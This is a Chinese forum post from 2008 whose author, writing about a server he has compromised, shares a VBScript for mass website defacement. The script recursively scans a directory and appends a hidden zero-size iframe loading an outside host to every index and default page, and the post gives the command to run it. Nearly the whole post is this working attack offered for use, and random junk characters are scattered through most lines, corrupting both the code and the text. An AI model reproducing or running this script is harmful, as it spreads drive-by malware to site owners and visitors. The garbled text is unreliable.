我爱电脑技术论坛 » 编程语言 » VBS也能批量挂马！

期未考试 发表于 2008-5-18 22:47

VBS也能批量挂马！

好不容易才得到一台肉鸡，在保住肉鸡的同时还不免要扩大自己的成果。挂马其实是一个不错的选择，还有很多比我们菜的菜鸟还不懂打补丁呢（嘻嘻……）!前天下载了个批量挂马程序看了下200多K，想放在肉鸡上测试一下，好不容易才上传到肉鸡上不知怎么，运行的时候弹出个错误窗口肉鸡就挂了(真是悲哀………)！于是就想自己用脚本写个，个子小又有安全感！（Socket:下次进一个网站估计要中几十次木马了。）T0npsF
Z
主要功能：遍历目录，寻找符合条件的文件把马写进去。
qKGhrQ
rD:s 下面的是代码，只要把代码copy到文件里另存为scan.vbe在cmd下运行。%?C["q,J[j*w2t
cscript scan.vbe 要挂马的目录Q{IHz)O
例：cscript scan.vbe D:\
-Q%Q0iRy '版权信息-U%TpaZv7z)i
br="************************************" & vbCrLf
*vd9}9|w;hD | br=br & "* VBS 批量挂马脚本 *" & vbCrLf|,D[{d;w#@Q#R
br=br & "* BY BanLG *" & vbCrLf
1]+cUoa br=br & "************************************" & vbCrLf & vbCrLf
B"O^N"V2g I br=br & "cscript scan.vbe D:\" & vbCrLf
(I.d n*V3Pc~7{n "HeQ-m
pzw
'马的地址
'D+|TN` ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn" & chr(34) & "></IFrAME>"3zD Y2}YN F@]
&#39;要挂马的页面如果嫌不够还可以自己再加，记得要用”|”隔开e8^Jv^-\h@h
MyString="index.asp|index.html|index.htm|default.asp|default.html|default.htm"
U-|!p!`[ `N5p4n &#39;以"|"为分隔符拆分成数组
Q,{1fO|H#J;B MyArray = Split(MyString, "|", -1, 1)
9XJb;OIQAE;f ]QM$vE ] aU.z ?
web=WScript.Arguments(0)T^pX&Q
4E9|6JU1a9Q;J
&#39;如果web为空退出脚本.FTxe9tqD
if web="" then4[\R zn+t
Wscript.echo (br)xQ2^9R]:ia
window.Close
m0L5d;Bjc+K,y Bc'J end if9G.V&VWR?`!o2`
/O+o}li6JF
Wscript.echo (br) & "马的地址：" & ma & vbCrLf & vbCrLf
'MO;k4VM^^ &#39;创建对象6wl"s"]:^G
Set fso = createObject("Scripting.FileSystemObject")
'^ JsD$t;b7\7t#| }4q Vw:Jt
su
&#39;开始扫描挂马H(N8[wY+n!LpBx9['W"a
scan(web)
E&V;~7qYh7y'},~ ?n-]vx*Q-Y[
&#39;scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾 r T{eeSxVy
sub scan(filesder)
]!vg:^#fhNe } set filesder=fso.getfolder(filesder)
;X2aCm#V?'u3{7{ &#39;得到当前目录的所有文件集合2_"~5\P\7k0p
set files=filesder.files i7T;G5elG'Wq
&#39;获取文件名 OvP7[k;r1\)Q
for each fext in files Y:]U sJ*a;}
Set file1 = fso.GetFile(fext)
"Q3a%k7Zxl.L filesext=file1.Name;t:X Ci0s {.R?}T
&#39;把文件名转换成小写字母+oDJej'l$]!}F$y
ext=lcase(filesext) sTiM Lr%^`
For Each index in MyArray
Q4U,kQ
E"VPe &#39;判断文件是不是我们在MyString里限定的文件，如果是就写马,a3?9w
dcRlK2q2m;Pa
if ext=lcase(index) then
E l#@`/k#Y.b Set ts = fso.OpenTextFile(fext,8) &#39;打开文件并在文件末尾进行写操作
lp W
E2Y|:\ ts.WriteLine(ma)
D$Pp@&~-seR ts.CloseO2}\G/{
echo=""X-ah$cn}Z"|F
echo=fext & " .............ok"
B8A^9X!?.r a&u"V
Wscript.echo (echo)D!H6EHXJ/p}'x
end if\xI/JP
next
^-F h2v'WkB next2u'oh#J;VQ(t%a
:tW&J+M@u_
set subfolders=filesder.subfolders$y%\ `L;U8gp&~LFV,P
for each subfolder in subfolders &#39;搜索其他目录,递归调用
4|nN'R S@La3HS` scan(subfolder) A @H(S(N7g6V'\
next l-m#_1hr
end sub_4s,WwJ PN

H:{R%Anl 下面是我在本地测试的。

查看完整版本: VBS也能批量挂马！